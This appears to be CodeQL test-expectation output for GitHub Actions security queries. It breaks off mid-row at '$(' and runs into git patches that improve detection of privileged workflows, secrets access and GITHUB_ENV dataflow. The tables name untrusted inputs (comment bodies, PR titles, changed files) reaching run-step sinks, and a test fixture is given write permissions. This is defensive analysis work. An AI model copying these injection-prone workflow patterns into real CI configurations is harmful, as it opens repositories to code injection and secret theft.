.github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | -| dorny/paths-filter | * | output.changes | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | -| jitterbit/get-changed-files | * | output.added | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | -| jitterbit/get-changed-files | * | output.all | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | -| jitterbit/get-changed-files | * | output.modified | PR changed files | -| jitterbit/get-changed-files | * | output.removed | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | -| tj-actions/branch-names | * | output.current_branch | PR current branch | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | -| tj-actions/changed-files | * | output.copied_files | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | -| tj-actions/changed-files | * | output.modified_files | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | -| trilom/file-changes-action | * | output.files | PR changed files | -| trilom/file-changes-action | * | output.files_added | PR changed files | -| trilom/file-changes-action | * | output.files_modified | PR changed files | -| trilom/file-changes-action | * | output.files_removed | PR changed files | -| tzkhan/pr-update-action | * | output.headMatch | | -| xt0rted/slash-command-action | * | output.command-arguments | | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | -| bobheadxi/deployments | * | input.env | output.env | taint | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | -| csexton/release-asset-action | * | input.release-url | output.url | taint | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | -| frabert/replace-string-action | * | input.string | output.replaced | taint | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | -| getsentry/action-release | * | input.version | output.version | taint | -| getsentry/action-release | * | input.version_prefix | output.version | taint | -| github/codeql-action | * | input.output | output.sarif-output | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | -| haya14busa/action-cond | * | input.if_false | output.value | taint | -| haya14busa/action-cond | * | input.if_true | output.value | taint | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | -| jsdaniell/create-json | * | input.json | output.successfully | taint | -| jsdaniell/create-json | * | input.name | output.successfully | taint | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | -| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $( Date: Thu, 11 Apr 2024 16:23:51 +0200 Subject: [PATCH 168/707] Improve privleged workflow detection --- ql/lib/codeql/actions/Ast.qll | 17 ++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 23 +++++++++++++++++++ ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- .../CWE-094/.github/workflows/simple3.yml | 2 +- 4 files changed, 40 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cf5b63399f0a..91ee95a90ab4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -20,7 +20,7 @@ module Utils { } bindingset[str] - string trimQuotes(string str) { + private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -212,6 +212,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { } predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" and + // The Workflow accesses a secret + exists(SecretsExpression expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or // The Workflow is triggered by an event other than `pull_request` not this.hasSingleTrigger("pull_request") or @@ -248,7 +255,11 @@ class Outputs extends AstNode instanceof OutputsImpl { override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof PermissionsImpl { } +class Permissions extends AstNode instanceof PermissionsImpl { + string getPermission(string perm) { result = super.getPermission(perm) } + + string getAPermission() { result = super.getAPermission() } +} class Strategy extends AstNode instanceof StrategyImpl { Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } @@ -348,6 +359,8 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } + class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bba5c1a47d34..300377536d67 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -484,6 +484,10 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } override YamlMapping getNode() { result = n } + + string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + + string getAPermission() { result = this.getPermission(_) } } class StrategyImpl extends AstNodeImpl, TStrategyNode { @@ -851,6 +855,25 @@ private string inputsCtxRegex() { Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } +private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } + +/** + * Holds for an expression accesing the `secrets` context. + * e.g. `${{ secrets.FOO }}` + */ +class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + SecretsExpressionImpl() { + Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 6d3910e2ca5c..19b007902bd0 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity warning * @precision high - * @security-severity 9.3 + * @security-severity 5.0 * @id actions/artifact-poisoning * @tags actions * security diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index be1559d47110..3128aacc93ce 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -8,7 +8,7 @@ on: permissions: actions: read checks: read - contents: read + contents: write jobs: echo_trigger: From 29cef4fd7358cf329d111cd616cff2611b59097c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:24:51 +0200 Subject: [PATCH 169/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aa02154bab14..f5b3952ce96b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.9 +version: 0.0.10 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 134b0db2b171..7c1cc78df4a3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.9 +version: 0.0.10 groups: - actions - queries From 2925380e72bdc2174b33db84e5a5c12d6cc7982e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:27:40 +0200 Subject: [PATCH 170/707] Remove dummy models --- ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml deleted file mode 100644 index 65952bccb35a..000000000000 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ /dev/null @@ -1,17 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel - data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sinkModel - data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] From db86c40c5066cfb211926b4715741af6841c885c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:40 +0200 Subject: [PATCH 171/707] Enable dataflow through GITHUB_ENV vars --- ql/lib/codeql/actions/Ast.qll | 4 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 88 +-- .../dataflow/internal/DataFlowPrivate.qll | 14 +- .../security/ArtifactPoisoningQuery.qll | 16 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../.github/workflows/multiline.yml | 40 +- ql/test/library-tests/test.expected | 523 +++++++++++++++++- .../CWE-077/.github/workflows/test4.yml | 17 +- .../Security/CWE-077/EnvVarInjection.expected | 6 + .../PrivilegedEnvVarInjection.expected | 8 + .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 4 +- 14 files changed, 655 insertions(+), 76 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91ee95a90ab4..edee4d03eb4c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -25,7 +25,7 @@ module Utils { } bindingset[line, var] - private predicate extractLineAssignment(string line, string var, string key, string value) { + predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | // single line assignment assignment = @@ -59,7 +59,7 @@ module Utils { } bindingset[script, var] - private predicate extractMultilineAssignment(string script, string var, string key, string value) { + predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment exists(string flattenedScript | flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 300377536d67..a66befe7d7d2 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1010,6 +1010,9 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) + or + // Some Run steps may store taint in the enclosing job so we need to check the enclosing job + result = this.getEnclosingJob() } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 01aa8bbc3200..c937aaa550b9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -170,7 +170,7 @@ private class CompositeActionInputSource extends RemoteFlowSource { * A 